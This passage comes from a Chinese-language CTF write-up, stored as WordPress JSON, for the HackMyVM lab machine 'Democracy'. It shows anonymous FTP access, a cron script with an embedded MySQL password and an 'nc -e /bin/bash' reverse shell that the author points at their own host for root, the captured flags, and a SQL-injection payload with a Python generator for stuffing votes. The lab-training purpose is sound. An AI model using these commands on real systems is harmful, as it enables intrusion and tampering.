AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV\/Sx5gw\/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX\/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+\/5R0D\/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx\/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9\/d6o2oWdMM=\n|   256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f\/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=\n|   256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS\n80\/tcp open  http    syn-ack Apache httpd 2.4.56 ((Debian))\n|_http-title: Vote for Your Candidate\n|_http-server-header: Apache\/2.4.56 (Debian)\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>\u53d1\u73b0\u5f00\u653e\u4e86<code>ftp<\/code>\u7aef\u53e3\uff01\u533f\u540d\u767b\u5f55\uff0c\u53d1\u73b0\u53ef\u4fee\u6539\uff0c\u91cd\u65b0\u4fee\u6539\u4e0a\u4f20\uff0c\u53cd\u5f39shell\u8fc7\u6765\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Democracy]\n\u2514\u2500$ ftp 192.168.0.148     \nConnected to 192.168.0.148.\n220 ProFTPD Server (Debian) [::ffff:192.168.0.148]\nName (192.168.0.148:kali): anonymous\n331 Anonymous login ok, send your complete email address as your password\nPassword: \n230 Anonymous access granted, restrictions apply\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||61169|)\n150 Opening ASCII mode data connection for file list\ndrwxr-xr-x   2 ftp      nogroup      4096 Apr 30  2023 .\ndrwxr-xr-x   2 ftp      nogroup      4096 Apr 30  2023 ..\n-rwxrwxrwx   1 root     root          258 Apr 30  2023 votes\n226 Transfer complete\nftp&gt; get votes\nlocal: votes remote: votes\n229 Entering Extended Passive Mode (|||47430|)\n150 Opening BINARY mode data connection for votes (258 bytes)\n100% |***********************************************************************************************************|   258        2.96 MiB\/s    00:00 ETA\n226 Transfer complete\n258 bytes received in 00:00 (390.62 KiB\/s)\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Democracy]\n\u2514\u2500$ cat votes                                                                                                 \n#! \/bin\/bash\n\n## this script runs every minute ##\n\n#!\/bin\/bash\n\nmysql -u root -pYklX69Vfa voting &lt;&lt; EOF\n\nSELECT COUNT(*) FROM votes WHERE candidate=&#039;republican&#039;;\n\nSELECT COUNT(*) FROM votes WHERE candidate=&#039;democrat&#039;;\n\nEOF\n\nnc -e \/bin\/bash 192.168.0.29 4444\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Democracy]\n\u2514\u2500$ vim votes\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Democracy]\n\u2514\u2500$ cat votes\n#! \/bin\/bash\n\n## this script runs every minute ##\n\n#!\/bin\/bash\n\nmysql -u root -pYklX69Vfa voting &lt;&lt; EOF\n\nSELECT COUNT(*) FROM votes WHERE candidate=&#039;republican&#039;;\n\nSELECT COUNT(*) FROM votes WHERE candidate=&#039;democrat&#039;;\n\nEOF\n\nnc -e \/bin\/bash 192.168.0.143 1234\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Democracy]\n\u2514\u2500$ ftp 192.168.0.148\nConnected to 192.168.0.148.\n220 ProFTPD Server (Debian) [::ffff:192.168.0.148]\nName (192.168.0.148:kali): anonymous\n331 Anonymous login ok, send your complete email address as your password\nPassword: \n230 Anonymous access granted, restrictions apply\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; put votes\nlocal: votes remote: votes\n229 Entering Extended Passive Mode (|||31574|)\n150 Opening BINARY mode data connection for votes\n100% |***********************************************************************************************************|   259        2.44 MiB\/s    00:00 ETA\n226 Transfer complete\n259 bytes sent in 00:00 (243.20 KiB\/s)\nftp&gt; exit\n221 Goodbye.<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547042.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404291547042.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429154415334\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u4e0brootshell\u4e86\uff01\uff01\uff01\uff01\u8bfb\u53d6flag\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) root@democracy.hmv:\/root# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\n(remote) root@democracy.hmv:\/root# ls -la\ntotal 28\ndrwx------  4 root root 4096 Apr 30  2023 .\ndrwxr-xr-x 19 root root 4096 Apr 30  2023 ..\nlrwxrwxrwx  1 root root    9 Feb  6  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\ndrwxr-xr-x  2 root root 4096 Apr 30  2023 .cache\ndrwxr-xr-x  3 root root 4096 Apr 30  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rwx------  1 root root   33 Apr 30  2023 root.txt\n(remote) root@democracy.hmv:\/root# cat root.txt \n081c1bc3fe537326ad7bcb8e571b1f5h\n(remote) root@democracy.hmv:\/root# cd \/home\n(remote) root@democracy.hmv:\/home# ls\ntrump\n(remote) root@democracy.hmv:\/home# cd trump\/\n(remote) root@democracy.hmv:\/home\/trump# ls -la\ntotal 24\ndrwxr-xr-x 2 trump trump 4096 Apr 30  2023 .\ndrwxr-xr-x 3 root  root  4096 Apr 30  2023 ..\nlrwxrwxrwx 1 root  root     9 Apr 30  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 trump trump  220 Apr 30  2023 .bash_logout\n-rw-r--r-- 1 trump trump 3526 Apr 30  2023 .bashrc\n-rw-r--r-- 1 trump trump  807 Apr 30  2023 .profile\n-rwx------ 1 trump trump   33 Apr 30  2023 user.txt\n(remote) root@democracy.hmv:\/home\/trump# cat user.txt \n399dba2fcf50acb2110f5e44380d20e4<\/code><\/pre>\n<h3>\u89e3\u6cd5\u4e8c\uff1a\u6293\u5305\u8fdb\u884c\u4fee\u6539<\/h3>\n<p>\u5728<code>0xh3rshel<\/code>\u5e08\u5085\u535a\u5ba2\u770b\u5230\u7684\u505a\u6cd5\uff1a<\/p>\n<pre><code class=\"language-bash\">candidate=democrat&#039;)+union+SELECT+1,&quot;democrat&quot;+--+-<\/code><\/pre>\n<pre><code class=\"language-python\">#!\/bin\/python3\n\nresult = &quot;democrat&#039;)+&quot;\n\nfor i in range(1,1001):\n   result = result + &#039;union+SELECT+&#039;+str(i)+&#039;,&quot;democrat&quot;+&#039;\nresult = result + &quot;--+-&quot;\n\nprint(result)<\/code><\/pre>\n<p>\u6293\u5305\u4fee\u6539\u653e\u8fdb\u53bb\uff0c\u8fd0\u884c\u81ea\u52a8\u6295\u7968\uff01\uff01\uff01\uff01\uff01 \u795e\u4e4e\u5176\u6280\uff01\uff01\uff01<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/0xh3rshel.github.io\/hmv-democracy\/\">https:\/\/0xh3rshel.github.io\/hmv-democracy\/<\/a><\/p>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=bwuiViw7JWs\">https:\/\/www.youtube.com\/watch?v=bwuiViw7JWs<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Democracy \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/Democracy] \u2514\u2500$ ru [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-659","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/659","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=659"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/659\/revisions"}],"predecessor-version":[{"id":660,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/659\/revisions\/660"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=659"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=659"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=659"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}